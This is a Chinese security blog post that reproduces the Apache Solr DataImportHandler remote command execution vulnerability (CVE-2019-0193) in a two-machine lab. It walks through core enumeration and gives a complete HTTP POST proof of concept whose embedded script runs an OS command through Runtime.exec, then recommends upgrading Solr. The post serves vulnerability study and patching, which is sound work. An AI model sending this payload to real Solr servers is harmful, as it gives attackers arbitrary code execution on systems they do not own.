freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Apache Solr 远程命令执行漏洞复现
Skylei 2023-07-06 16:55:45 141766
所属地 黑龙江省

一、漏洞描述

2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含脚本,因此,会存在远程代码执行漏洞。

二、漏洞环境

操作系统IP地址用途
Windows 10 企业版192.168.37.142靶机
Windows 10 专业版192.168.37.203攻击机

三、漏洞环境搭建步骤

1、服务器需要安装Java环境并配置环境变量;

2、服务器需要安装curl环境:

(1)下载curl包:https://skanthak.homepage.t-online.de/download/curl-7.64.1.cab

(2)将下载的curl包解压至C:\Program Files\curl文件夹,如下图所示:

1688633310_64a67fdeeb193abafdc33.png!small

(3)配置环境变量:类似java环境变量 右键此电脑-->属性à高级系统设置-->环境变量-->系统变量创建CURL_HOME变量值为C:\Program Files\curl -->系统变量path中新建值为%CURL_HOME%\I386  -->保存退出。环境变量配置结果如下图所示:

创建CURL_HOME变量如下图所示:

1688633375_64a6801f08c0132e1f521.png!small

系统变量path中新增结果如下图所示:

1688633396_64a68034614c5f7eaa376.png!small

(4)打开doc窗口,输入curl –help:结果如下图所示:

1688633428_64a68054b2f8158af05ff.png!small

3、漏洞环境配置:

(1)下载Apache solr:

https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

(2)下载成功后解压至任意目录

(3)进入解压的目录使用cmd命令执行以下命令:bin/solr -e dih 结果如下图所示:

1688633486_64a6808e6f9f12e77a768.png!small

(4)如上图所示,看到successful字样表示漏洞环境搭建成功。

(5)使用攻击机访问靶机ip:8983成功,结果如下图所示:

1688633515_64a680abe50b890b711f6.png!small

四、漏洞复现过程

1、首先通过接口curl http://192.168.37.142/solr/admin/cores或使用浏览器访问:http://192.168.37.142:8983/solr/admin/cores来获取所有core信息,下面我们构造payload需要name信息。结果如下图所示:

1688633555_64a680d3cdd52032a7fa6.png!small

1688633563_64a680db0e5d2f05f042c.png!small

2、在Burp中发送以下POC即可执行命令弹出计算器,下面的<your_core_name>需要替换为你获取到的core的name(共两处)。POC如下:

POST /solr/<your_core_name>/dataimport HTTP/1.1

Host: 127.0.0.1:8983

Content-Length: 763

User-Agent: Mozilla/5.0

Content-type: application/x-www-form-urlencoded

Connection: close


command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=

<dataConfig>

<dataSource type="URLDataSource"/>

<script><![CDATA[

function poc(row){

var process= java.lang.Runtime.getRuntime();

process.exec("calc");

return row;

}

]]></script>

<document>

<entity name="stackoverflow"

url="https://stackoverflow.com/feeds/tag/solr"

processor="XPathEntityProcessor"

forEach="/feed"

transformer="script:poc" />

</document>

</dataConfig>

验证过程如下图所示:

(1)在Burp中发送poc,结果如下图所示:

1688633614_64a6810e5d4666de33294.png!small

(2)漏洞执行效果如下图所示:

1688633631_64a6811fba34c60c526e3.png!small

五、漏洞修复建议

将Apache Solr升级至8.2.0或之后的版本。

# 漏洞 # 网络安全 # 系统安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Skylei 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Skylei LV.3
这家伙太懒了,还未填写个人描述!
  • 5 文章数
  • 0 关注者
CVE-2019-14287 linux sudo root权限绕过漏洞复现
2023-07-06
ThinkPHP5远程命令执行漏洞复现总结
2023-07-06
ThinVNC-身份验证绕过(CVE-2019-17662)漏洞复现总结
2023-07-06
文章目录